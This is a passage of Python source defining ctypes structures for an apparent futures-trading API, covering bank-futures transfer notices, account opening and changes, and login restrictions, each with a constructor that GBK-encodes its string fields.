self.BankID = BankID.encode("GBK")
if BankBranchID:
self.BankBranchID = BankBranchID.encode("GBK")
if BrokerID:
self.BrokerID = BrokerID.encode("GBK")
if BrokerBranchID:
self.BrokerBranchID = BrokerBranchID.encode("GBK")
if TradeDate:
self.TradeDate = TradeDate.encode("GBK")
if TradeTime:
self.TradeTime = TradeTime.encode("GBK")
if BankSerial:
self.BankSerial = BankSerial.encode("GBK")
if TradingDay:
self.TradingDay = TradingDay.encode("GBK")
if PlateSerial:
self.PlateSerial = PlateSerial
if LastFragment:
self.LastFragment = LastFragment.encode("GBK")
if SessionID:
self.SessionID = SessionID
if InstallID:
self.InstallID = InstallID
if UserID:
self.UserID = UserID.encode("GBK")
if Digest:
self.Digest = Digest.encode("GBK")
if CurrencyID:
self.CurrencyID = CurrencyID.encode("GBK")
if DeviceID:
self.DeviceID = DeviceID.encode("GBK")
if BrokerIDByBank:
self.BrokerIDByBank = BrokerIDByBank.encode("GBK")
if OperNo:
self.OperNo = OperNo.encode("GBK")
if RequestID:
self.RequestID = RequestID
if TID:
self.TID = TID
if ErrorID:
self.ErrorID = ErrorID
if ErrorMsg:
self.ErrorMsg = ErrorMsg.encode("GBK")
if PinKey:
self.PinKey = PinKey.encode("GBK")
if MacKey:
self.MacKey = MacKey.encode("GBK")
class NotifyFutureSignOut(Struct):
_fields_ = [
("TradeCode", c_char_Array_7),
("BankID", c_char_Array_4),
("BankBranchID", c_char_Array_5),
("BrokerID", c_char_Array_11),
("BrokerBranchID", c_char_Array_31),
("TradeDate", c_char_Array_9),
("TradeTime", c_char_Array_9),
("BankSerial", c_char_Array_13),
("TradingDay", c_char_Array_9),
("PlateSerial", c_int),
("LastFragment", c_char),
("SessionID", c_int),
("InstallID", c_int),
("UserID", c_char_Array_16),
("Digest", c_char_Array_36),
("CurrencyID", c_char_Array_4),
("DeviceID", c_char_Array_3),
("BrokerIDByBank", c_char_Array_33),
("OperNo", c_char_Array_17),
("RequestID", c_int),
("TID", c_int),
("ErrorID", c_int),
("ErrorMsg", c_char_Array_81),
]
def __init__(self, TradeCode=None, BankID=None, BankBranchID=None, BrokerID=None, BrokerBranchID=None, TradeDate=None, TradeTime=None, BankSerial=None, TradingDay=None, PlateSerial=None, LastFragment=None, SessionID=None, InstallID=None, UserID=None, Digest=None, CurrencyID=None, DeviceID=None, BrokerIDByBank=None, OperNo=None, RequestID=None, TID=None, ErrorID=None, ErrorMsg=None):
super().__init__()
if TradeCode:
self.TradeCode = TradeCode.encode("GBK")
if BankID:
self.BankID = BankID.encode("GBK")
if BankBranchID:
self.BankBranchID = BankBranchID.encode("GBK")
if BrokerID:
self.BrokerID = BrokerID.encode("GBK")
if BrokerBranchID:
self.BrokerBranchID = BrokerBranchID.encode("GBK")
if TradeDate:
self.TradeDate = TradeDate.encode("GBK")
if TradeTime:
self.TradeTime = TradeTime.encode("GBK")
if BankSerial:
self.BankSerial = BankSerial.encode("GBK")
if TradingDay:
self.TradingDay = TradingDay.encode("GBK")
if PlateSerial:
self.PlateSerial = PlateSerial
if LastFragment:
self.LastFragment = LastFragment.encode("GBK")
if SessionID:
self.SessionID = SessionID
if InstallID:
self.InstallID = InstallID
if UserID:
self.UserID = UserID.encode("GBK")
if Digest:
self.Digest = Digest.encode("GBK")
if CurrencyID:
self.CurrencyID = CurrencyID.encode("GBK")
if DeviceID:
self.DeviceID = DeviceID.encode("GBK")
if BrokerIDByBank:
self.BrokerIDByBank = BrokerIDByBank.encode("GBK")
if OperNo:
self.OperNo = OperNo.encode("GBK")
if RequestID:
self.RequestID = RequestID
if TID:
self.TID = TID
if ErrorID:
self.ErrorID = ErrorID
if ErrorMsg:
self.ErrorMsg = ErrorMsg.encode("GBK")
class NotifySyncKey(Struct):
_fields_ = [
("TradeCode", c_char_Array_7),
("BankID", c_char_Array_4),
("BankBranchID", c_char_Array_5),
("BrokerID", c_char_Array_11),
("BrokerBranchID", c_char_Array_31),
("TradeDate", c_char_Array_9),
("TradeTime", c_char_Array_9),
("BankSerial", c_char_Array_13),
("TradingDay", c_char_Array_9),
("PlateSerial", c_int),
("LastFragment", c_char),
("SessionID", c_int),
("InstallID", c_int),
("UserID", c_char_Array_16),
("Message", c_char_Array_129),
("DeviceID", c_char_Array_3),
("BrokerIDByBank", c_char_Array_33),
("OperNo", c_char_Array_17),
("RequestID", c_int),
("TID", c_int),
("ErrorID", c_int),
("ErrorMsg", c_char_Array_81),
]
def __init__(self, TradeCode=None, BankID=None, BankBranchID=None, BrokerID=None, BrokerBranchID=None, TradeDate=None, TradeTime=None, BankSerial=None, TradingDay=None, PlateSerial=None, LastFragment=None, SessionID=None, InstallID=None, UserID=None, Message=None, DeviceID=None, BrokerIDByBank=None, OperNo=None, RequestID=None, TID=None, ErrorID=None, ErrorMsg=None):
super().__init__()
if TradeCode:
self.TradeCode = TradeCode.encode("GBK")
if BankID:
self.BankID = BankID.encode("GBK")
if BankBranchID:
self.BankBranchID = BankBranchID.encode("GBK")
if BrokerID:
self.BrokerID = BrokerID.encode("GBK")
if BrokerBranchID:
self.BrokerBranchID = BrokerBranchID.encode("GBK")
if TradeDate:
self.TradeDate = TradeDate.encode("GBK")
if TradeTime:
self.TradeTime = TradeTime.encode("GBK")
if BankSerial:
self.BankSerial = BankSerial.encode("GBK")
if TradingDay:
self.TradingDay = TradingDay.encode("GBK")
if PlateSerial:
self.PlateSerial = PlateSerial
if LastFragment:
self.LastFragment = LastFragment.encode("GBK")
if SessionID:
self.SessionID = SessionID
if InstallID:
self.InstallID = InstallID
if UserID:
self.UserID = UserID.encode("GBK")
if Message:
self.Message = Message.encode("GBK")
if DeviceID:
self.DeviceID = DeviceID.encode("GBK")
if BrokerIDByBank:
self.BrokerIDByBank = BrokerIDByBank.encode("GBK")
if OperNo:
self.OperNo = OperNo.encode("GBK")
if RequestID:
self.RequestID = RequestID
if TID:
self.TID = TID
if ErrorID:
self.ErrorID = ErrorID
if ErrorMsg:
self.ErrorMsg = ErrorMsg.encode("GBK")
class QryAccountregister(Struct):
_fields_ = [
("BrokerID", c_char_Array_11),
("AccountID", c_char_Array_13),
("BankID", c_char_Array_4),
("BankBranchID", c_char_Array_5),
("CurrencyID", c_char_Array_4),
]
def __init__(self, BrokerID=None, AccountID=None, BankID=None, BankBranchID=None, CurrencyID=None):
super().__init__()
if BrokerID:
self.BrokerID = BrokerID.encode("GBK")
if AccountID:
self.AccountID = AccountID.encode("GBK")
if BankID:
self.BankID = BankID.encode("GBK")
if BankBranchID:
self.BankBranchID = BankBranchID.encode("GBK")
if CurrencyID:
self.CurrencyID = CurrencyID.encode("GBK")
class Accountregister(Struct):
_fields_ = [
("TradeDay", c_char_Array_9),
("BankID", c_char_Array_4),
("BankBranchID", c_char_Array_5),
("BankAccount", c_char_Array_41),
("BrokerID", c_char_Array_11),
("BrokerBranchID", c_char_Array_31),
("AccountID", c_char_Array_13),
("IdCardType", c_char),
("IdentifiedCardNo", c_char_Array_51),
("CustomerName", c_char_Array_51),
("CurrencyID", c_char_Array_4),
("OpenOrDestroy", c_char),
("RegDate", c_char_Array_9),
("OutDate", c_char_Array_9),
("TID", c_int),
("CustType", c_char),
("BankAccType", c_char),
("LongCustomerName", c_char_Array_161),
]
def __init__(self, TradeDay=None, BankID=None, BankBranchID=None, BankAccount=None, BrokerID=None, BrokerBranchID=None, AccountID=None, IdCardType=None, IdentifiedCardNo=None, CustomerName=None, CurrencyID=None, OpenOrDestroy=None, RegDate=None, OutDate=None, TID=None, CustType=None, BankAccType=None, LongCustomerName=None):
super().__init__()
if TradeDay:
self.TradeDay = TradeDay.encode("GBK")
if BankID:
self.BankID = BankID.encode("GBK")
if BankBranchID:
self.BankBranchID = BankBranchID.encode("GBK")
if BankAccount:
self.BankAccount = BankAccount.encode("GBK")
if BrokerID:
self.BrokerID = BrokerID.encode("GBK")
if BrokerBranchID:
self.BrokerBranchID = BrokerBranchID.encode("GBK")
if AccountID:
self.AccountID = AccountID.encode("GBK")
if IdCardType:
self.IdCardType = IdCardType.encode("GBK")
if IdentifiedCardNo:
self.IdentifiedCardNo = IdentifiedCardNo.encode("GBK")
if CustomerName:
self.CustomerName = CustomerName.encode("GBK")
if CurrencyID:
self.CurrencyID = CurrencyID.encode("GBK")
if OpenOrDestroy:
self.OpenOrDestroy = OpenOrDestroy.encode("GBK")
if RegDate:
self.RegDate = RegDate.encode("GBK")
if OutDate:
self.OutDate = OutDate.encode("GBK")
if TID:
self.TID = TID
if CustType:
self.CustType = CustType.encode("GBK")
if BankAccType:
self.BankAccType = BankAccType.encode("GBK")
if LongCustomerName:
self.LongCustomerName = LongCustomerName.encode("GBK")
class OpenAccount(Struct):
_fields_ = [
("TradeCode", c_char_Array_7),
("BankID", c_char_Array_4),
("BankBranchID", c_char_Array_5),
("BrokerID", c_char_Array_11),
("BrokerBranchID", c_char_Array_31),
("TradeDate", c_char_Array_9),
("TradeTime", c_char_Array_9),
("BankSerial", c_char_Array_13),
("TradingDay", c_char_Array_9),
("PlateSerial", c_int),
("LastFragment", c_char),
("SessionID", c_int),
("CustomerName", c_char_Array_51),
("IdCardType", c_char),
("IdentifiedCardNo", c_char_Array_51),
("Gender", c_char),
("CountryCode", c_char_Array_21),
("CustType", c_char),
("Address", c_char_Array_101),
("ZipCode", c_char_Array_7),
("Telephone", c_char_Array_41),
("MobilePhone", c_char_Array_21),
("Fax", c_char_Array_41),
("EMail", c_char_Array_41),
("MoneyAccountStatus", c_char),
("BankAccount", c_char_Array_41),
("BankPassWord", c_char_Array_41),
("AccountID", c_char_Array_13),
("Password", c_char_Array_41),
("InstallID", c_int),
("VerifyCertNoFlag", c_char),
("CurrencyID", c_char_Array_4),
("CashExchangeCode", c_char),
("Digest", c_char_Array_36),
("BankAccType", c_char),
("DeviceID", c_char_Array_3),
("BankSecuAccType", c_char),
("BrokerIDByBank", c_char_Array_33),
("BankSecuAcc", c_char_Array_41),
("BankPwdFlag", c_char),
("SecuPwdFlag", c_char),
("OperNo", c_char_Array_17),
("TID", c_int),
("UserID", c_char_Array_16),
("ErrorID", c_int),
("ErrorMsg", c_char_Array_81),
("LongCustomerName", c_char_Array_161),
]
def __init__(self, TradeCode=None, BankID=None, BankBranchID=None, BrokerID=None, BrokerBranchID=None, TradeDate=None, TradeTime=None, BankSerial=None, TradingDay=None, PlateSerial=None, LastFragment=None, SessionID=None, CustomerName=None, IdCardType=None, IdentifiedCardNo=None, Gender=None, CountryCode=None, CustType=None, Address=None, ZipCode=None, Telephone=None, MobilePhone=None, Fax=None, EMail=None, MoneyAccountStatus=None, BankAccount=None, BankPassWord=None, AccountID=None, Password=None, InstallID=None, VerifyCertNoFlag=None, CurrencyID=None, CashExchangeCode=None, Digest=None, BankAccType=None, DeviceID=None, BankSecuAccType=None, BrokerIDByBank=None, BankSecuAcc=None, BankPwdFlag=None, SecuPwdFlag=None, OperNo=None, TID=None, UserID=None, ErrorID=None, ErrorMsg=None, LongCustomerName=None):
super().__init__()
if TradeCode:
self.TradeCode = TradeCode.encode("GBK")
if BankID:
self.BankID = BankID.encode("GBK")
if BankBranchID:
self.BankBranchID = BankBranchID.encode("GBK")
if BrokerID:
self.BrokerID = BrokerID.encode("GBK")
if BrokerBranchID:
self.BrokerBranchID = BrokerBranchID.encode("GBK")
if TradeDate:
self.TradeDate = TradeDate.encode("GBK")
if TradeTime:
self.TradeTime = TradeTime.encode("GBK")
if BankSerial:
self.BankSerial = BankSerial.encode("GBK")
if TradingDay:
self.TradingDay = TradingDay.encode("GBK")
if PlateSerial:
self.PlateSerial = PlateSerial
if LastFragment:
self.LastFragment = LastFragment.encode("GBK")
if SessionID:
self.SessionID = SessionID
if CustomerName:
self.CustomerName = CustomerName.encode("GBK")
if IdCardType:
self.IdCardType = IdCardType.encode("GBK")
if IdentifiedCardNo:
self.IdentifiedCardNo = IdentifiedCardNo.encode("GBK")
if Gender:
self.Gender = Gender.encode("GBK")
if CountryCode:
self.CountryCode = CountryCode.encode("GBK")
if CustType:
self.CustType = CustType.encode("GBK")
if Address:
self.Address = Address.encode("GBK")
if ZipCode:
self.ZipCode = ZipCode.encode("GBK")
if Telephone:
self.Telephone = Telephone.encode("GBK")
if MobilePhone:
self.MobilePhone = MobilePhone.encode("GBK")
if Fax:
self.Fax = Fax.encode("GBK")
if EMail:
self.EMail = EMail.encode("GBK")
if MoneyAccountStatus:
self.MoneyAccountStatus = MoneyAccountStatus.encode("GBK")
if BankAccount:
self.BankAccount = BankAccount.encode("GBK")
if BankPassWord:
self.BankPassWord = BankPassWord.encode("GBK")
if AccountID:
self.AccountID = AccountID.encode("GBK")
if Password:
self.Password = Password.encode("GBK")
if InstallID:
self.InstallID = InstallID
if VerifyCertNoFlag:
self.VerifyCertNoFlag = VerifyCertNoFlag.encode("GBK")
if CurrencyID:
self.CurrencyID = CurrencyID.encode("GBK")
if CashExchangeCode:
self.CashExchangeCode = CashExchangeCode.encode("GBK")
if Digest:
self.Digest = Digest.encode("GBK")
if BankAccType:
self.BankAccType = BankAccType.encode("GBK")
if DeviceID:
self.DeviceID = DeviceID.encode("GBK")
if BankSecuAccType:
self.BankSecuAccType = BankSecuAccType.encode("GBK")
if BrokerIDByBank:
self.BrokerIDByBank = BrokerIDByBank.encode("GBK")
if BankSecuAcc:
self.BankSecuAcc = BankSecuAcc.encode("GBK")
if BankPwdFlag:
self.BankPwdFlag = BankPwdFlag.encode("GBK")
if SecuPwdFlag:
self.SecuPwdFlag = SecuPwdFlag.encode("GBK")
if OperNo:
self.OperNo = OperNo.encode("GBK")
if TID:
self.TID = TID
if UserID:
self.UserID = UserID.encode("GBK")
if ErrorID:
self.ErrorID = ErrorID
if ErrorMsg:
self.ErrorMsg = ErrorMsg.encode("GBK")
if LongCustomerName:
self.LongCustomerName = LongCustomerName.encode("GBK")
class CancelAccount(Struct):
_fields_ = [
("TradeCode", c_char_Array_7),
("BankID", c_char_Array_4),
("BankBranchID", c_char_Array_5),
("BrokerID", c_char_Array_11),
("BrokerBranchID", c_char_Array_31),
("TradeDate", c_char_Array_9),
("TradeTime", c_char_Array_9),
("BankSerial", c_char_Array_13),
("TradingDay", c_char_Array_9),
("PlateSerial", c_int),
("LastFragment", c_char),
("SessionID", c_int),
("CustomerName", c_char_Array_51),
("IdCardType", c_char),
("IdentifiedCardNo", c_char_Array_51),
("Gender", c_char),
("CountryCode", c_char_Array_21),
("CustType", c_char),
("Address", c_char_Array_101),
("ZipCode", c_char_Array_7),
("Telephone", c_char_Array_41),
("MobilePhone", c_char_Array_21),
("Fax", c_char_Array_41),
("EMail", c_char_Array_41),
("MoneyAccountStatus", c_char),
("BankAccount", c_char_Array_41),
("BankPassWord", c_char_Array_41),
("AccountID", c_char_Array_13),
("Password", c_char_Array_41),
("InstallID", c_int),
("VerifyCertNoFlag", c_char),
("CurrencyID", c_char_Array_4),
("CashExchangeCode", c_char),
("Digest", c_char_Array_36),
("BankAccType", c_char),
("DeviceID", c_char_Array_3),
("BankSecuAccType", c_char),
("BrokerIDByBank", c_char_Array_33),
("BankSecuAcc", c_char_Array_41),
("BankPwdFlag", c_char),
("SecuPwdFlag", c_char),
("OperNo", c_char_Array_17),
("TID", c_int),
("UserID", c_char_Array_16),
("ErrorID", c_int),
("ErrorMsg", c_char_Array_81),
("LongCustomerName", c_char_Array_161),
]
def __init__(self, TradeCode=None, BankID=None, BankBranchID=None, BrokerID=None, BrokerBranchID=None, TradeDate=None, TradeTime=None, BankSerial=None, TradingDay=None, PlateSerial=None, LastFragment=None, SessionID=None, CustomerName=None, IdCardType=None, IdentifiedCardNo=None, Gender=None, CountryCode=None, CustType=None, Address=None, ZipCode=None, Telephone=None, MobilePhone=None, Fax=None, EMail=None, MoneyAccountStatus=None, BankAccount=None, BankPassWord=None, AccountID=None, Password=None, InstallID=None, VerifyCertNoFlag=None, CurrencyID=None, CashExchangeCode=None, Digest=None, BankAccType=None, DeviceID=None, BankSecuAccType=None, BrokerIDByBank=None, BankSecuAcc=None, BankPwdFlag=None, SecuPwdFlag=None, OperNo=None, TID=None, UserID=None, ErrorID=None, ErrorMsg=None, LongCustomerName=None):
super().__init__()
if TradeCode:
self.TradeCode = TradeCode.encode("GBK")
if BankID:
self.BankID = BankID.encode("GBK")
if BankBranchID:
self.BankBranchID = BankBranchID.encode("GBK")
if BrokerID:
self.BrokerID = BrokerID.encode("GBK")
if BrokerBranchID:
self.BrokerBranchID = BrokerBranchID.encode("GBK")
if TradeDate:
self.TradeDate = TradeDate.encode("GBK")
if TradeTime:
self.TradeTime = TradeTime.encode("GBK")
if BankSerial:
self.BankSerial = BankSerial.encode("GBK")
if TradingDay:
self.TradingDay = TradingDay.encode("GBK")
if PlateSerial:
self.PlateSerial = PlateSerial
if LastFragment:
self.LastFragment = LastFragment.encode("GBK")
if SessionID:
self.SessionID = SessionID
if CustomerName:
self.CustomerName = CustomerName.encode("GBK")
if IdCardType:
self.IdCardType = IdCardType.encode("GBK")
if IdentifiedCardNo:
self.IdentifiedCardNo = IdentifiedCardNo.encode("GBK")
if Gender:
self.Gender = Gender.encode("GBK")
if CountryCode:
self.CountryCode = CountryCode.encode("GBK")
if CustType:
self.CustType = CustType.encode("GBK")
if Address:
self.Address = Address.encode("GBK")
if ZipCode:
self.ZipCode = ZipCode.encode("GBK")
if Telephone:
self.Telephone = Telephone.encode("GBK")
if MobilePhone:
self.MobilePhone = MobilePhone.encode("GBK")
if Fax:
self.Fax = Fax.encode("GBK")
if EMail:
self.EMail = EMail.encode("GBK")
if MoneyAccountStatus:
self.MoneyAccountStatus = MoneyAccountStatus.encode("GBK")
if BankAccount:
self.BankAccount = BankAccount.encode("GBK")
if BankPassWord:
self.BankPassWord = BankPassWord.encode("GBK")
if AccountID:
self.AccountID = AccountID.encode("GBK")
if Password:
self.Password = Password.encode("GBK")
if InstallID:
self.InstallID = InstallID
if VerifyCertNoFlag:
self.VerifyCertNoFlag = VerifyCertNoFlag.encode("GBK")
if CurrencyID:
self.CurrencyID = CurrencyID.encode("GBK")
if CashExchangeCode:
self.CashExchangeCode = CashExchangeCode.encode("GBK")
if Digest:
self.Digest = Digest.encode("GBK")
if BankAccType:
self.BankAccType = BankAccType.encode("GBK")
if DeviceID:
self.DeviceID = DeviceID.encode("GBK")
if BankSecuAccType:
self.BankSecuAccType = BankSecuAccType.encode("GBK")
if BrokerIDByBank:
self.BrokerIDByBank = BrokerIDByBank.encode("GBK")
if BankSecuAcc:
self.BankSecuAcc = BankSecuAcc.encode("GBK")
if BankPwdFlag:
self.BankPwdFlag = BankPwdFlag.encode("GBK")
if SecuPwdFlag:
self.SecuPwdFlag = SecuPwdFlag.encode("GBK")
if OperNo:
self.OperNo = OperNo.encode("GBK")
if TID:
self.TID = TID
if UserID:
self.UserID = UserID.encode("GBK")
if ErrorID:
self.ErrorID = ErrorID
if ErrorMsg:
self.ErrorMsg = ErrorMsg.encode("GBK")
if LongCustomerName:
self.LongCustomerName = LongCustomerName.encode("GBK")
class ChangeAccount(Struct):
_fields_ = [
("TradeCode", c_char_Array_7),
("BankID", c_char_Array_4),
("BankBranchID", c_char_Array_5),
("BrokerID", c_char_Array_11),
("BrokerBranchID", c_char_Array_31),
("TradeDate", c_char_Array_9),
("TradeTime", c_char_Array_9),
("BankSerial", c_char_Array_13),
("TradingDay", c_char_Array_9),
("PlateSerial", c_int),
("LastFragment", c_char),
("SessionID", c_int),
("CustomerName", c_char_Array_51),
("IdCardType", c_char),
("IdentifiedCardNo", c_char_Array_51),
("Gender", c_char),
("CountryCode", c_char_Array_21),
("CustType", c_char),
("Address", c_char_Array_101),
("ZipCode", c_char_Array_7),
("Telephone", c_char_Array_41),
("MobilePhone", c_char_Array_21),
("Fax", c_char_Array_41),
("EMail", c_char_Array_41),
("MoneyAccountStatus", c_char),
("BankAccount", c_char_Array_41),
("BankPassWord", c_char_Array_41),
("NewBankAccount", c_char_Array_41),
("NewBankPassWord", c_char_Array_41),
("AccountID", c_char_Array_13),
("Password", c_char_Array_41),
("BankAccType", c_char),
("InstallID", c_int),
("VerifyCertNoFlag", c_char),
("CurrencyID", c_char_Array_4),
("BrokerIDByBank", c_char_Array_33),
("BankPwdFlag", c_char),
("SecuPwdFlag", c_char),
("TID", c_int),
("Digest", c_char_Array_36),
("ErrorID", c_int),
("ErrorMsg", c_char_Array_81),
("LongCustomerName", c_char_Array_161),
]
def __init__(self, TradeCode=None, BankID=None, BankBranchID=None, BrokerID=None, BrokerBranchID=None, TradeDate=None, TradeTime=None, BankSerial=None, TradingDay=None, PlateSerial=None, LastFragment=None, SessionID=None, CustomerName=None, IdCardType=None, IdentifiedCardNo=None, Gender=None, CountryCode=None, CustType=None, Address=None, ZipCode=None, Telephone=None, MobilePhone=None, Fax=None, EMail=None, MoneyAccountStatus=None, BankAccount=None, BankPassWord=None, NewBankAccount=None, NewBankPassWord=None, AccountID=None, Password=None, BankAccType=None, InstallID=None, VerifyCertNoFlag=None, CurrencyID=None, BrokerIDByBank=None, BankPwdFlag=None, SecuPwdFlag=None, TID=None, Digest=None, ErrorID=None, ErrorMsg=None, LongCustomerName=None):
super().__init__()
if TradeCode:
self.TradeCode = TradeCode.encode("GBK")
if BankID:
self.BankID = BankID.encode("GBK")
if BankBranchID:
self.BankBranchID = BankBranchID.encode("GBK")
if BrokerID:
self.BrokerID = BrokerID.encode("GBK")
if BrokerBranchID:
self.BrokerBranchID = BrokerBranchID.encode("GBK")
if TradeDate:
self.TradeDate = TradeDate.encode("GBK")
if TradeTime:
self.TradeTime = TradeTime.encode("GBK")
if BankSerial:
self.BankSerial = BankSerial.encode("GBK")
if TradingDay:
self.TradingDay = TradingDay.encode("GBK")
if PlateSerial:
self.PlateSerial = PlateSerial
if LastFragment:
self.LastFragment = LastFragment.encode("GBK")
if SessionID:
self.SessionID = SessionID
if CustomerName:
self.CustomerName = CustomerName.encode("GBK")
if IdCardType:
self.IdCardType = IdCardType.encode("GBK")
if IdentifiedCardNo:
self.IdentifiedCardNo = IdentifiedCardNo.encode("GBK")
if Gender:
self.Gender = Gender.encode("GBK")
if CountryCode:
self.CountryCode = CountryCode.encode("GBK")
if CustType:
self.CustType = CustType.encode("GBK")
if Address:
self.Address = Address.encode("GBK")
if ZipCode:
self.ZipCode = ZipCode.encode("GBK")
if Telephone:
self.Telephone = Telephone.encode("GBK")
if MobilePhone:
self.MobilePhone = MobilePhone.encode("GBK")
if Fax:
self.Fax = Fax.encode("GBK")
if EMail:
self.EMail = EMail.encode("GBK")
if MoneyAccountStatus:
self.MoneyAccountStatus = MoneyAccountStatus.encode("GBK")
if BankAccount:
self.BankAccount = BankAccount.encode("GBK")
if BankPassWord:
self.BankPassWord = BankPassWord.encode("GBK")
if NewBankAccount:
self.NewBankAccount = NewBankAccount.encode("GBK")
if NewBankPassWord:
self.NewBankPassWord = NewBankPassWord.encode("GBK")
if AccountID:
self.AccountID = AccountID.encode("GBK")
if Password:
self.Password = Password.encode("GBK")
if BankAccType:
self.BankAccType = BankAccType.encode("GBK")
if InstallID:
self.InstallID = InstallID
if VerifyCertNoFlag:
self.VerifyCertNoFlag = VerifyCertNoFlag.encode("GBK")
if CurrencyID:
self.CurrencyID = CurrencyID.encode("GBK")
if BrokerIDByBank:
self.BrokerIDByBank = BrokerIDByBank.encode("GBK")
if BankPwdFlag:
self.BankPwdFlag = BankPwdFlag.encode("GBK")
if SecuPwdFlag:
self.SecuPwdFlag = SecuPwdFlag.encode("GBK")
if TID:
self.TID = TID
if Digest:
self.Digest = Digest.encode("GBK")
if ErrorID:
self.ErrorID = ErrorID
if ErrorMsg:
self.ErrorMsg = ErrorMsg.encode("GBK")
if LongCustomerName:
self.LongCustomerName = LongCustomerName.encode("GBK")
class SecAgentACIDMap(Struct):
_fields_ = [
("BrokerID", c_char_Array_11),
("UserID", c_char_Array_16),
("AccountID", c_char_Array_13),
("CurrencyID", c_char_Array_4),
("BrokerSecAgentID", c_char_Array_13),
]
def __init__(self, BrokerID=None, UserID=None, AccountID=None, CurrencyID=None, BrokerSecAgentID=None):
super().__init__()
if BrokerID:
self.BrokerID = BrokerID.encode("GBK")
if UserID:
self.UserID = UserID.encode("GBK")
if AccountID:
self.AccountID = AccountID.encode("GBK")
if CurrencyID:
self.CurrencyID = CurrencyID.encode("GBK")
if BrokerSecAgentID:
self.BrokerSecAgentID = BrokerSecAgentID.encode("GBK")
class QrySecAgentACIDMap(Struct):
_fields_ = [
("BrokerID", c_char_Array_11),
("UserID", c_char_Array_16),
("AccountID", c_char_Array_13),
("CurrencyID", c_char_Array_4),
]
def __init__(self, BrokerID=None, UserID=None, AccountID=None, CurrencyID=None):
super().__init__()
if BrokerID:
self.BrokerID = BrokerID.encode("GBK")
if UserID:
self.UserID = UserID.encode("GBK")
if AccountID:
self.AccountID = AccountID.encode("GBK")
if CurrencyID:
self.CurrencyID = CurrencyID.encode("GBK")
class UserRightsAssign(Struct):
_fields_ = [
("BrokerID", c_char_Array_11),
("UserID", c_char_Array_16),
("DRIdentityID", c_int),
]
def __init__(self, BrokerID=None, UserID=None, DRIdentityID=None):
super().__init__()
if BrokerID:
self.BrokerID = BrokerID.encode("GBK")
if UserID:
self.UserID = UserID.encode("GBK")
if DRIdentityID:
self.DRIdentityID = DRIdentityID
class BrokerUserRightAssign(Struct):
_fields_ = [
("BrokerID", c_char_Array_11),
("DRIdentityID", c_int),
("Tradeable", c_int),
]
def __init__(self, BrokerID=None, DRIdentityID=None, Tradeable=None):
super().__init__()
if BrokerID:
self.BrokerID = BrokerID.encode("GBK")
if DRIdentityID:
self.DRIdentityID = DRIdentityID
if Tradeable:
self.Tradeable = Tradeable
class DRTransfer(Struct):
_fields_ = [
("OrigDRIdentityID", c_int),
("DestDRIdentityID", c_int),
("OrigBrokerID", c_char_Array_11),
("DestBrokerID", c_char_Array_11),
]
def __init__(self, OrigDRIdentityID=None, DestDRIdentityID=None, OrigBrokerID=None, DestBrokerID=None):
super().__init__()
if OrigDRIdentityID:
self.OrigDRIdentityID = OrigDRIdentityID
if DestDRIdentityID:
self.DestDRIdentityID = DestDRIdentityID
if OrigBrokerID:
self.OrigBrokerID = OrigBrokerID.encode("GBK")
if DestBrokerID:
self.DestBrokerID = DestBrokerID.encode("GBK")
class FensUserInfo(Struct):
_fields_ = [
("BrokerID", c_char_Array_11),
("UserID", c_char_Array_16),
("LoginMode", c_char),
]
def __init__(self, BrokerID=None, UserID=None, LoginMode=None):
super().__init__()
if BrokerID:
self.BrokerID = BrokerID.encode("GBK")
if UserID:
self.UserID = UserID.encode("GBK")
if LoginMode:
self.LoginMode = LoginMode.encode("GBK")
class CurrTransferIdentity(Struct):
_fields_ = [
("IdentityID", c_int),
]
def __init__(self, IdentityID=None):
super().__init__()
if IdentityID:
self.IdentityID = IdentityID
class LoginForbiddenUser(Struct):
_fields_ = [
("BrokerID", c_char_Array_11),
("UserID", c_char_Array_16),
("IPAddress", c_char_Array_16),
]
def __init__(self, BrokerID=None, UserID=None, IPAddress=None):
super().__init__()
if BrokerID:
self.BrokerID = BrokerID.encode("GBK")
if UserID:
self.UserID = UserID.encode("GBK")
if IPAddress:
self.IPAddress = IPAddress.encode("GBK")
class QryLoginForbiddenUser(Struct):
_fields_ = [
("BrokerID", c_char_Array_11),
("UserID", c_char_Array_16),
]
def __init__(self, BrokerID=None, UserID=None):
super().__init__()
if BrokerID:
self.BrokerID = BrokerID.encode("GBK")
if UserID:
self.UserID = UserID.encode("GBK")
class MulticastGroupInfo(Struct):
_fields_ = [
("GroupIP", c_char_Array_16),
("GroupPort", c_int),
("SourceIP", c_char_Array_16),
]
def __init__(self, GroupIP=None, GroupPort=None, SourceIP=None):
super().__init__()
if GroupIP:
self.GroupIP = GroupIP.encode("GBK")
if GroupPort:
self.GroupPort = GroupPort
if SourceIP:
self.SourceIP = SourceIP.encode("GBK")
class TradingAccountReserve(Struct):
_fields_ = [
("BrokerID", c_char_Array_11),
("AccountID", c_char_Array_13),
("Reserve", c_double),
("CurrencyID", c_char_Array_4),
]
def __init__(self, BrokerID=None, AccountID=None, Reserve=None, CurrencyID=None):
super().__init__()
if BrokerID:
self.BrokerID = BrokerID.encode("GBK")
if AccountID:
self.AccountID = AccountID.encode("GBK")
if Reserve:
self.Reserve = Reserve
if CurrencyID:
self.CurrencyID = CurrencyID.encode("GBK")
class QryLoginForbiddenIP(Struct):
_fields_ = [
("IPAddress", c_char_Array_16),
]
def __init__(self, IPAddress=None):
super().__init__()
if IPAddress:
self.IPAddress = IPAddress.encode("GBK")
class QryIPList(Struct):
_fields_ = [
("IPAddress", c_char_Array_16),
]
def __init__(self, IPAddress=None):
super().__init__()
if IPAddress:
self.IPAddress = IPAddress.encode("GBK")
class QryUserRightsAssign(Struct):
_fields_ = [
("BrokerID", c_char_Array_11),
("UserID", c_char_Array_16),
]
def __init__(self, BrokerID=None, UserID=None):
super().__init__()
if BrokerID:
self.BrokerID = BrokerID.encode("GBK")
if UserID:
self.UserID = UserID.encode("GBK")
class ReserveOpenAccountConfirm(Struct):
_fields_ = [
("TradeCode", c_char_Array_7),
("BankID", c_char_Array_4),
("BankBranchID", c_char_Array_5),
("BrokerID", c_char_Array_11),
("BrokerBranchID", c_char_Array_31),
("TradeDate", c_char_Array_9),
("TradeTime", c_char_Array_9),
("BankSerial", c_char_Array_13),
("TradingDay", c_char_Array_9),
("PlateSerial", c_int),
("LastFragment", c_char),
("SessionID", c_int),
("CustomerName", c_char_Array_161),
("IdCardType", c_char),
("IdentifiedCardNo", c_char_Array_51),
("Gender", c_char),
("CountryCode", c_char_Array_21),
("CustType", c_char),
("Address", c_char_Array_101),
("ZipCode", c_char_Array_7),
("Telephone", c_char_Array_41),
("MobilePhone", c_char_Array_21),
